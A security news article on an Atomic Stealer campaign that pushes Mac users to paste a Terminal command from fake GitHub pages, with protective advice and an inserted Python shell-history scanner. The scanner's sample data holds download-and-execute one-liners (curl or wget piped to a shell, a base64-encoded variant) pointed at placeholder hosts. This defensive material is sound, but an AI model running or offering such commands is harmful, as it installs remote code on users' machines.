
macOS Users Targeted by Atomic Stealer Malware on GitHub

Summary

– A widespread malware campaign is targeting macOS users by using SEO to push fraudulent GitHub repositories that impersonate popular software downloads.
– Attackers employ a social engineering trick, instructing users to run a terminal command that downloads and installs the Atomic infostealer malware.
– The campaign uses fake sites impersonating GitHub and tricks users into entering their device password to finalize the malicious installation.
– LastPass is disrupting the campaign by getting fraudulent repositories removed but warns users to remain cautious as the threat is ongoing.
– Users who installed the malware should assume their passwords and sensitive data are compromised and should avoid downloading software from unknown GitHub sources.

Individuals searching for widely used applications like LastPass, 1Password, After Effects, and Gemini on their Macs face a significant threat: inadvertently installing the Atomic Stealer malware instead. A new, widespread campaign is tricking users through fraudulent GitHub repositories that appear to offer legitimate software downloads.

Attackers are creating these deceptive repositories and then using search engine optimization (SEO) techniques to ensure links to their malicious pages appear prominently in search results on Google and Bing. According to analysis from LastPass, this scheme targets a broad spectrum of organizations, including technology firms, financial services, and password management companies. The GitHub pages are cleverly named, often combining the targeted software’s name with Mac-related terms, such as “LastPass Premium on MacBook.”

When a user clicks to download the software, they are redirected to a separate site designed to mimic GitHub. There, they receive instructions to copy and paste a specific command into their Mac’s Terminal application. Executing this command triggers a shell script that downloads and installs the Atomic Stealer (AMOS) malware onto the system. A final step requests the user’s device password to complete the installation, granting the malware full access.

This method employs a social engineering tactic known as the ClickFix trick. Because the user, rather than a downloaded application, runs the installer by hand in Terminal, it sidesteps macOS safeguards such as Gatekeeper and XProtect that would otherwise inspect a downloaded app bundle. This same technique was observed in a previous campaign distributing the Shamos infostealer.
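The page does not publish the exact command the fake GitHub page tells victims to paste, so the following is an added, defender-side example rather than anything from the article or from LastPass: a small Python scanner that reads shell-history lines and flags the download-and-execute one-liners that ClickFix-style lures rely on (a remote script piped into a shell, a base64-decoded payload piped into a shell, or a shell running the output of a fetch inside a command substitution). The history lines, host names and rule names are constructed for the example; real history can be fed in by reading `~/.zsh_history` or `~/.bash_history`, and the `strip_zsh_extended` helper handles zsh's extended-history prefix.

```python
import re

# Constructed sample history lines (illustrative only, not from the article).
SAMPLE_HISTORY = [
    "ls -la ~/Downloads",
    "brew install audacity",
    'curl -fsSL "https://example.invalid/install.sh" | bash',
    "echo 'Y3VybCAtcyBodHRwOi8vZXhhbXBsZS5pbnZhbGlkIHwgYmFzaA==' | base64 -d | sh",
    "git clone https://github.com/example/repo.git",
    "wget -qO- http://example.invalid/setup.sh | sh -",
    'bash -c "$(curl -fsSL https://example.invalid/x)"',
]

SHELLS = r"(?:sh|bash|zsh|dash)"
FETCHERS = r"(?:curl|wget)"

# Each rule is (human-readable reason, compiled regex). The rule names are
# our own labels, chosen for this example.
RULES = [
    ("remote script piped into a shell",
     re.compile(rf"\b{FETCHERS}\b[^|]*\|\s*(?:sudo\s+)?{SHELLS}\b")),
    ("base64-decoded payload piped into a shell",
     re.compile(rf"\bbase64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:sudo\s+)?{SHELLS}\b")),
    ("shell executing the output of a download",
     re.compile(rf"\b{SHELLS}\s+-c\s+[\"']?\$\(\s*{FETCHERS}\b")),
]

ZSH_EXTENDED_PREFIX = re.compile(r"^:\s*\d+:\d+;")


def strip_zsh_extended(line: str) -> str:
    """Remove zsh's ': <epoch>:<duration>;' extended-history prefix if present."""
    return ZSH_EXTENDED_PREFIX.sub("", line, count=1)


def classify_command(line: str) -> list[str]:
    """Return the list of rule names that match a single command line."""
    cmd = strip_zsh_extended(line.strip())
    return [name for name, rx in RULES if rx.search(cmd)]


def scan_history(lines) -> list[dict]:
    """Scan history lines; return findings with 1-based line numbers and reasons."""
    findings = []
    for n, line in enumerate(lines, 1):
        reasons = classify_command(line)
        if reasons:
            findings.append({"line_no": n, "command": line.rstrip("\n"), "reasons": reasons})
    return findings


if __name__ == "__main__":
    # To check a real machine, replace SAMPLE_HISTORY with e.g.
    # open(os.path.expanduser("~/.zsh_history"), errors="replace").readlines()
    for f in scan_history(SAMPLE_HISTORY):
        print(f"[{f['line_no']}] {f['command']}\n    -> {', '.join(f['reasons'])}")
```

A match is a triage signal, not proof of compromise: legitimate installers also use `curl ... | bash`, so each hit should be reviewed against where the command came from. When a hit traces back to instructions copied from a web page, the article's advice applies: treat credentials on that machine as exposed and rotate them from a clean device.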

In response, LastPass has been actively working to disrupt the operation by reporting the fake repositories to GitHub, leading to their removal. The secondary impersonation site has also been taken down. However, the persistence of the attackers means vigilance is crucial for all Mac users.

A recent report on the Atomic Stealer malware campaign reveals a list of indicators of compromise (IoCs), including the URLs of numerous malicious repositories. These deceptive sites targeted users searching for popular software, such as the audio editor Audacity. This tactic highlights a growing trend of attackers using fake, yet seemingly legitimate, download sources.

If you have installed this malware, it is critical to assume your sensitive data has been compromised. The malware is designed to steal a wide range of information, including passwords, browser cookies, online banking details, and cryptocurrency wallet keys. Immediate action is necessary: you must secure all accounts and change credentials on a clean device.

To protect yourself from such threats, adopting a few key security practices is essential. Always download software directly from an official developer’s website or a trusted app store. Avoid unverified GitHub repositories, as they are a frequent source for these kinds of attacks. Similarly, never run Terminal commands provided by unverified sources.

Finally, consider employing a robust endpoint security solution that can detect malicious activity even after a file has been executed. Staying informed about the latest cybersecurity threats is also a vital part of maintaining your digital safety.

(Source: HelpNet Security)
